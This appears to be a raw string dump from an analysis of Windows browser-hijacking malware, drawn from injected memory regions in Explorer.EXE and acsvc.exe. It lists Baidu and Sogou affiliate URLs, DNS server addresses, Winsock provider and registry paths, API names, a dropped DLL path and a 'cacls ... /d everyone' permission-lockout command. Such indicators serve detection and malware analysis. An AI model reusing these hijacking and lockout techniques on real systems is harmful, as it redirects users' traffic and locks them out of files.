6.00.3790.4589 (srv03_sp2_gdr.090914-1233)
6.00.3790.4589 (srv03_sp2_qfe.090914-1233)
6.00.3790.4672 (srv03_sp2_gdr.100225-1230)
6.00.3790.4672 (srv03_sp2_qfe.100225-1230)
6.00.3790.4696 (srv03_sp2_gdr.100419-1942)
6.00.3790.4732 (srv03_sp2_gdr.100623-0356)
6.00.3790.4732 (srv03_sp2_qfe.100623-0356)
6.00.3790.4772 (srv03_sp2_gdr.100908-1010)
6.00.3790.4772 (srv03_sp2_qfe.100908-1010)
6.00.3790.4795 (srv03_sp2_qfe.101103-0357)
6.00.3790.4807 (srv03_sp2_gdr.101220-0307)
6.00.3790.4807 (srv03_sp2_qfe.101220-0307)
6.00.3790.4835 (srv03_sp2_gdr.110222-0239)
6.00.3790.4835 (srv03_sp2_qfe.110222-0239)
6.00.3790.4857 (srv03_sp2_gdr.110425-0335)
6.00.3790.4857 (srv03_sp2_qfe.110425-0335)
6.00.3790.4879 (srv03_sp2_gdr.110621-0342)
6.00.3790.4879 (srv03_sp2_qfe.110621-0342)
6.00.3790.4904 (srv03_sp2_gdr.110905-0334)
6.00.3790.4904 (srv03_sp2_qfe.110905-0334)
6.00.3790.4929 (srv03_sp2_gdr.111104-0342)
6.00.3790.4929 (srv03_sp2_qfe.111104-0342)
6.00.3790.4944 (srv03_sp2_gdr.111216-0308)
6.00.3790.4944 (srv03_sp2_qfe.111216-0308)
6.00.3790.4969 (srv03_sp2_gdr.120228-0234)
6.00.3790.4969 (srv03_sp2_qfe.120228-0234)
6.00.3790.5004 (srv03_sp2_gdr.120515-0336)
6.00.3790.5004 (srv03_sp2_qfe.120515-0336)
6.00.3790.5029 (srv03_sp2_gdr.120628-0335)
6.00.3790.5029 (srv03_sp2_qfe.120628-0335)
6.00.3790.5060 (srv03_sp2_gdr.120824-0334)
6.00.3790.5060 (srv03_sp2_qfe.120824-0334)
6.00.3790.5080 (srv03_sp2_gdr.121026-1534)
6.00.3790.5080 (srv03_sp2_qfe.121026-1534)
HTTP/1.
HTTP/1.1 302 Moved Temporarily
http://www.baidu.com/s? tn=
http://www.baidu.com/
http://www.sogou.com/sogou? pid=
http://www.sogou.com/index. pid=
http://rlt.inte.sogou.com/
%Program Files%\E-yoo\EyooSechelper2.dll
http://
XXXXXXXXXXXXXXXX
Software\Microsoft\Windows\ShellNoRoam\TempCache
Software\Microsoft\Windows\ShellNoRoam\ShellCache
herollq.exe
WebPlayer2010.exe
VODPlayer.exe
JSKPBrowser.exe
ValeBrowser.exe
wmconfig.exe
NewBho.DLL
\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object
software\policies\microsoft\windows nt\dnsclient
ws2_32.dll
ole32.dll
ieui.dll
mshtml.dll
IEFrame.dll
iertutil.dll
User32.dll
SHLWAPI.dll
wininet.dll
urlmon.dll
mswsock.dll
ws2help.dll
RegOpenKeyExA
RegOpenKeyExW
NtQueryValueKey
NtOpenKey
ADVAPI32.dll
ntdll.dll
Kernel32.dll
dnsapi.dll
msvcrt
PubwinClient.exe
RunMe.exe
{11F09AFE-75AD-4E52-AB43-E09E9351CE17}
Shell.User\Group
oleaut32.dll
browseti.dll
hinthk.dll
zclm8.com
wq581.com
maimeng8.com
5sla.com
wb360.net
renren.com
jj123.com.cn
wb12318.com
iwb110.com
woai310.com
http://123.sogou.com
http://www.sogou.com/sogou
http://www.sogou.com/index
.info
http://baidu.com
{X-X-x-XX-XXXXXX}
www.soso.com
www.google.com
www.hao123.com
www.tao123.com
www.baidu.com
123.sogou.com
www.sogou.com
www.iwb110.com
rpcrt4.dll
kernel32.dll
{xxxx-xx-xx-xx-xxxxxx}
127.0.0.1
208.67.222.222
208.67.220.220
114.114.114.114
114.114.115.115
8.8.8.8
8.8.8.9
8.8.4.4
Shell.Dusn
1.2.3
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
ZwQueryValueKey
ZwOpenKey
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}
xxxxxx
http://www.baidu.com/adrc.php?
http://www.baidu.com/baidu.php?
http://www.baidu.com/s?
http://www.hao123.com/?
http://123.sogou.com/?
http://www.sogou.com/img/fav.ico?
http://pv.sogou.com/pv.gif?
http://pb.sogou.com/pv.gif?
http://pb.sogou.com/cl.gif?
http://www.google.com/aclk?
http://www.sogou.com/bill_
http://www.sogou.com/sogou?
http://test.hermes.sogou.com/sa.gif?
http://www.sogou.com/index.htm
118.145.16.80
%SystemRoot%\System32\mswsock.dll
Tcpip
SupportedNameSpace
%SystemRoot%\System32\winrnr.dll
%SystemRoot%\system32\mswsock.dll
%SystemRoot%\system32\rsvpsp.dll
|%SystemRoot%\system32\rsvpsp.dll
000000000011
000000000010
000000000009
000000000008
000000000007
000000000006
000000000005
000000000004
000000000003
000000000002
000000000001
shdocvw.dll
ieframe.dll
http://www.sogou.com/sogou?query=
sogou-netb-xx-d
%%X
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeaders
\StringFileInfo\xx\%s
user32.dll
6.0.2800.1106
6.00.2600.0000
6.00.2600.0000 (xpclient.010817-1148)
6.00.2737.800
6.00.2800.1106
6.00.2800.1106 (xpsp1.020828-1920)
6.00.2800.1400
6.00.2800.1485
6.00.2800.1496
6.00.2800.1603
6.00.2800.1607
6.00.2800.1611
6.00.2800.1615
6.00.2800.1617
6.00.2800.1623
6.00.2800.1627
6.00.2800.1632
6.00.2800.1644
6.00.2800.1649
6.00.2800.1650
6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
6.00.2900.2518 (xpsp.040919-1030)
6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)
6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)
6.00.2900.2598 (xpsp.041130-1728)
6.00.2900.2627 (xpsp.050309-1719)
6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
6.00.2900.2668 (xpsp.050430-1553)
6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)
6.00.2900.2713 (xpsp.050702-1518)
6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)
6.00.2900.2753 (xpsp.050902-1331)
6.00.2900.2781 (xpsp.051020-1728)
6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)
6.00.2900.2823 (xpsp.060106-1527)
6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)
6.00.2900.2861 (xpsp.060303-1528)
6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)
6.00.2900.2904 (xpsp.060509-0230)
6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)
6.00.2900.2937 (xpsp.060623-0011)
6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)
6.00.2900.2995 (xpsp.060913-0019)
6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)
6.00.2900.3020 (xpsp.061023-0222)
6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)
6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)
6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)
6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)
6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)
6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)
6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)
6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)
6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)
6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)
6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)
6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)
6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)
6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)
6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)
6.00.2900.3300 (xpsp.080125-2028)
6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)
6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)
6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)
6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)
6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)
6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)
6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)
6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)
6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)
6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)
6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)
6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)
6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)
6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)
6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)
6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)
6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)
6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)
6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)
6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)
6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)
6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)
6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)
6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)
6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)
6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)
6.00.2900.5512 (xpsp.080413-2105)
6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)
6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)
6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)
6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)
6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)
6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)
6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)
6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)
6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)
6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)
6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)
6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)
6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)
6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)
6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)
6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)
6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)
6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)
6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)
6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)
6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)
6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)
6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)
6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)
6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)
6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)
6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)
6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)
6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)
6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)
6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)
6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)
6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)
6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)
6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)
6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)
6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)
6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)
6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)
6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)
6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)
6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)
6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)
6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)
6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)
6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)
6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)
6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)
6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)
6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)
6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)
6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)
6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)
6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)
6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)
6.00.3790.0 (srv03_rtm.030324-2048)
6.00.3790.118 (srv03_gdr.031205-1652)
6.00.3790.118 (srv03_qfe.031205-1652)
6.00.3790.1830 (srv03_sp1_rtm.050324-1447)
6.00.3790.186 (srv03_gdr.040410-1234)
6.00.3790.186 (srv03_qfe.040410-1236)
6.00.3790.2509 (srv03_sp1_gdr.050815-1517)
6.00.3790.2653 (srv03_sp1_gdr.060303-1536)
6.00.3790.2653 (srv03_sp1_qfe.060303-1552)
6.00.3790.2732 (srv03_sp1_gdr.060623-0310)
6.00.3790.2732 (srv03_sp1_qfe.060623-0318)
6.00.3790.2817 (srv03_sp1_gdr.061023-0100)
6.00.3790.2993 (srv03_sp1_gdr.070817-1316)
6.00.3790.2993 (srv03_sp1_qfe.070817-1316)
6.00.3790.3041 (srv03_sp1_gdr.071107-1901)
6.00.3790.3041 (srv03_sp1_qfe.071107-1901)
6.00.3790.3091 (srv03_sp1_gdr.080215-1206)
6.00.3790.3091 (srv03_sp1_qfe.080215-1206)
6.00.3790.3194 (srv03_sp1_gdr.080819-1207)
6.00.3790.3194 (srv03_sp1_qfe.080819-1207)
6.00.3790.3229 (srv03_sp1_gdr.081016-1620)
6.00.3790.3229 (srv03_sp1_qfe.081016-1620)
6.00.3790.3304 (srv03_sp1_gdr.090303-1204)
6.00.3790.3304 (srv03_sp1_qfe.090303-1204)
6.00.3790.3959 (srv03_sp2_rtm.070216-1710)
6.00.3790.4186 (srv03_sp2_gdr.071108-1306)
6.00.3790.4186 (srv03_sp2_qfe.071108-1306)
6.00.3790.4210 (srv03_sp2_qfe.071221-1418)
6.00.3790.4237 (srv03_sp2_gdr.080215-1206)
6.00.3790.4237 (srv03_sp2_qfe.080215-1206)
6.00.3790.4275 (srv03_sp2_gdr.080417-1307)
6.00.3790.4275 (srv03_sp2_qfe.080417-1307)
6.00.3790.4324 (srv03_sp2_qfe.080630-1205)
6.00.3790.4357 (srv03_sp2_gdr.080819-1207)
6.00.3790.4357 (srv03_sp2_qfe.080819-1207)
6.00.3790.4392 (srv03_sp2_gdr.081016-1620)
6.00.3790.4392 (srv03_sp2_qfe.081016-1620)
6.00.3790.4470 (srv03_sp2_gdr.090303-1204)
6.00.3790.4470 (srv03_sp2_qfe.090303-1204)
6.00.3790.4504 (srv03_sp2_gdr.090428-1405)
6.00.3790.4504 (srv03_sp2_qfe.090428-1405)
6.00.3790.4539 (srv03_sp2_gdr.090626-1428)
6.00.3790.4539 (srv03_sp2_qfe.090626-1428)
6.00.3790.4589 (srv03_sp2_gdr.090914-1233)
6.00.3790.4589 (srv03_sp2_qfe.090914-1233)
6.00.3790.4672 (srv03_sp2_gdr.100225-1230)
6.00.3790.4672 (srv03_sp2_qfe.100225-1230)
6.00.3790.4696 (srv03_sp2_gdr.100419-1942)
6.00.3790.4732 (srv03_sp2_gdr.100623-0356)
6.00.3790.4732 (srv03_sp2_qfe.100623-0356)
6.00.3790.4772 (srv03_sp2_gdr.100908-1010)
6.00.3790.4772 (srv03_sp2_qfe.100908-1010)
6.00.3790.4795 (srv03_sp2_qfe.101103-0357)
6.00.3790.4807 (srv03_sp2_gdr.101220-0307)
6.00.3790.4807 (srv03_sp2_qfe.101220-0307)
6.00.3790.4835 (srv03_sp2_gdr.110222-0239)
6.00.3790.4835 (srv03_sp2_qfe.110222-0239)
6.00.3790.4857 (srv03_sp2_gdr.110425-0335)
6.00.3790.4857 (srv03_sp2_qfe.110425-0335)
6.00.3790.4879 (srv03_sp2_gdr.110621-0342)
6.00.3790.4879 (srv03_sp2_qfe.110621-0342)
6.00.3790.4904 (srv03_sp2_gdr.110905-0334)
6.00.3790.4904 (srv03_sp2_qfe.110905-0334)
6.00.3790.4929 (srv03_sp2_gdr.111104-0342)
6.00.3790.4929 (srv03_sp2_qfe.111104-0342)
6.00.3790.4944 (srv03_sp2_gdr.111216-0308)
6.00.3790.4944 (srv03_sp2_qfe.111216-0308)
6.00.3790.4969 (srv03_sp2_gdr.120228-0234)
6.00.3790.4969 (srv03_sp2_qfe.120228-0234)
6.00.3790.5004 (srv03_sp2_gdr.120515-0336)
6.00.3790.5004 (srv03_sp2_qfe.120515-0336)
6.00.3790.5029 (srv03_sp2_gdr.120628-0335)
6.00.3790.5029 (srv03_sp2_qfe.120628-0335)
6.00.3790.5060 (srv03_sp2_gdr.120824-0334)
6.00.3790.5060 (srv03_sp2_qfe.120824-0334)
6.00.3790.5080 (srv03_sp2_gdr.121026-1534)
6.00.3790.5080 (srv03_sp2_qfe.121026-1534)
HTTP/1.
HTTP/1.1 302 Moved Temporarily
http://www.baidu.com/s? tn=
http://www.baidu.com/
http://www.sogou.com/sogou? pid=
http://www.sogou.com/index. pid=
http://rlt.inte.sogou.com/
%System%\DqKgbb.dll
{6795ED75-58AA-8E4C-A8EA-3CAD7C47AB03}
http://index.woai310.com/index.htm?u=52097
GetProcessHeap
WinExec
GetCPInfo
RegDeleteKeyA
RegQueryInfoKeyA
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyA
RegOpenKeyA
RegCloseKey
UrlUnescapeA
EnumWindows
SetWindowsHookExA
EnumChildWindows
InternetCanonicalizeUrlA
InternetCrackUrlA
`.rdata
@.data
.reloc
KERNEL32.DLL
iphlpapi.dll
OLEAUT32.dll
PSAPI.DLL
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
Loader.dll
{9a4dda61-1d3a-49b7-9849-dac6cd30a393}
AutoConfigURL
_IID_IWEBBROWSER
MSAFD Tcpip [TCP/IP]
MSAFD Tcpip [UDP/IP]
MSAFD Tcpip [RAW/IP]
RSVP UDP Service Provider
\Device\NetBT_Tcpip
RSVP TCP Service Provider
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2
ikeeper.dll
rsvpsp.dll
nwprovau.dll
winrnr.dll

acsvc.exe_2168_rwx_10001000_0002E000:




__MSVCRT_HEAP_SELECT
user32.dll
PSAPI.DLL
i4VO.Wn}}4
uJ 9%d
s%F'`f
vp%Cl }F.
.Lu.-$ A
>%FZ7~
.DcPn%*
HN6.QK
KERNEL32.DLL
ADVAPI32.dll
iphlpapi.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
Loader.dll
Base:X
DLL_PROCESS_ATTACH %d
Length:%d opcode X offset:%d
MsgDebugView
%System%\DqKgbb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RarLhr\acsvc.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
.reloc

Explorer.EXE_1752_rwx_00FF0000_00004000:




C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp0.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW

Explorer.EXE_1752_rwx_01D80000_00005000:




%WinDir%\JMt\win32\rename.exe
%Program Files%\tango3\tango3.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW

Explorer.EXE_1752_rwx_01E61000_0002F000:




__MSVCRT_HEAP_SELECT
user32.dll
PSAPI.DLL
i4VO.Wn}}4
uJ 9%d
s%F'`f
vp%Cl }F.
.Lu.-$ A
>%FZ7~
.DcPn%*
HN6.QK
KERNEL32.DLL
ADVAPI32.dll
iphlpapi.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
Loader.dll
Base:X
DLL_PROCESS_ATTACH %d
Length:%d opcode X offset:%d
MsgDebugView
%System%\DqKgbb.dll
%WinDir%\Explorer.EXE
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
.reloc

Explorer.EXE_1752_rwx_020C0000_00053000:




__MSVCRT_HEAP_SELECT
inflate 1.2.3 Copyright 1995-2005 Mark Adler
iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
explorer.exe
igfxsrvc.exe
{5D562E5F-741F-4b50-AB7B-7A997CEB9557}
{XXXX-XX-XX-XX-XXXXXX}
cacls.exe "%s" /e /d everyone
%Program Files%\E-yoo\EyooSechelper2.dll
http://
XXXXXXXXXXXXXXXX
Software\Microsoft\Windows\ShellNoRoam\TempCache
Software\Microsoft\Windows\ShellNoRoam\ShellCache
herollq.exe
WebPlayer2010.exe
VODPlayer.exe
JSKPBrowser.exe
ValeBrowser.exe
wmconfig.exe
NewBho.DLL
\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object
software\policies\microsoft\windows nt\dnsclient
ws2_32.dll
ole32.dll
ieui.dll
mshtml.dll
IEFrame.dll
iertutil.dll
User32.dll
SHLWAPI.dll
wininet.dll
urlmon.dll
mswsock.dll
ws2help.dll
RegOpenKeyExA
RegOpenKeyExW
NtQueryValueKey
NtOpenKey
ADVAPI32.dll
ntdll.dll
Kernel32.dll
dnsapi.dll
msvcrt
PubwinClient.exe
RunMe.exe
{11F09AFE-75AD-4E52-AB43-E09E9351CE17}
Shell.User\Group
oleaut32.dll
browseti.dll
hinthk.dll
zclm8.com
wq581.com
maimeng8.com
5sla.com
wb360.net
renren.com
jj123.com.cn
wb12318.com
iwb110.com
woai310.com
http://123.sogou.com
http://www.sogou.com/sogou
http://www.sogou.com/index
.info
http://baidu.com
{X-X-x-XX-XXXXXX}
www.soso.com
www.google.com
www.hao123.com
www.tao123.com
www.baidu.com
123.sogou.com
www.sogou.com
www.iwb110.com
rpcrt4.dll
kernel32.dll
{xxxx-xx-xx-xx-xxxxxx}
127.0.0.1
208.67.222.222
208.67.220.220
114.114.114.114
114.114.115.115
8.8.8.8
8.8.8.9
8.8.4.4
Shell.Dusn
1.2.3
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
ZwQueryValueKey
ZwOpenKey
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}
xxxxxx
http://www.baidu.com/adrc.php?
http://www.baidu.com/baidu.php?
http://www.baidu.com/s?
http://www.hao123.com/?
http://123.sogou.com/?
http://www.sogou.com/img/fav.ico?
http://pv.sogou.com/pv.gif?
http://pb.sogou.com/pv.gif?
http://pb.sogou.com/cl.gif?
http://www.google.com/aclk?
http://www.sogou.com/bill_
http://www.sogou.com/sogou?
http://test.hermes.sogou.com/sa.gif?
http://www.sogou.com/index.htm
118.145.16.80
%SystemRoot%\System32\mswsock.dll
Tcpip
SupportedNameSpace
%SystemRoot%\System32\winrnr.dll
%SystemRoot%\system32\mswsock.dll
%SystemRoot%\system32\rsvpsp.dll
|%SystemRoot%\system32\rsvpsp.dll
000000000011
000000000010
000000000009
000000000008
000000000007
000000000006
000000000005
000000000004
000000000003
000000000002
000000000001
shdocvw.dll
ieframe.dll
http://www.sogou.com/sogou?query=
sogou-netb-xx-d
%%X
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeaders
\StringFileInfo\xx\%s
user32.dll
6.0.2800.1106
6.00.2600.0000
6.00.2600.0000 (xpclient.010817-1148)
6.00.2737.800
6.00.2800.1106
6.00.2800.1106 (xpsp1.020828-1920)
6.00.2800.1400
6.00.2800.1485
6.00.2800.1496
6.00.2800.1603
6.00.2800.1607
6.00.2800.1611
6.00.2800.1615
6.00.2800.1617
6.00.2800.1623
6.00.2800.1627
6.00.2800.1632
6.00.2800.1644
6.00.2800.1649
6.00.2800.1650
6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
6.00.2900.2518 (xpsp.040919-1030)
6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)
6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)
6.00.2900.2598 (xpsp.041130-1728)
6.00.2900.2627 (xpsp.050309-1719)
6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
6.00.2900.2668 (xpsp.050430-1553)
6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)
6.00.2900.2713 (xpsp.050702-1518)
6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)
6.00.2900.2753 (xpsp.050902-1331)
6.00.2900.2781 (xpsp.051020-1728)
6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)
6.00.2900.2823 (xpsp.060106-1527)
6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)
6.00.2900.2861 (xpsp.060303-1528)
6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)
6.00.2900.2904 (xpsp.060509-0230)
6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)
6.00.2900.2937 (xpsp.060623-0011)
6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)
6.00.2900.2995 (xpsp.060913-0019)
6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)
6.00.2900.3020 (xpsp.061023-0222)
6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)
6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)
6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)
6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)
6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)
6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)
6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)
6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)
6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)
6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)
6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)
6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)
6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)
6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)
6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)
6.00.2900.3300 (xpsp.080125-2028)
6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)
6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)
6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)
6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)
6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)
6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)
6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)
6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)
6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)
6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)
6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)
6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)
6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)
6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)
6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)
6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)
6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)
6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)
6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)
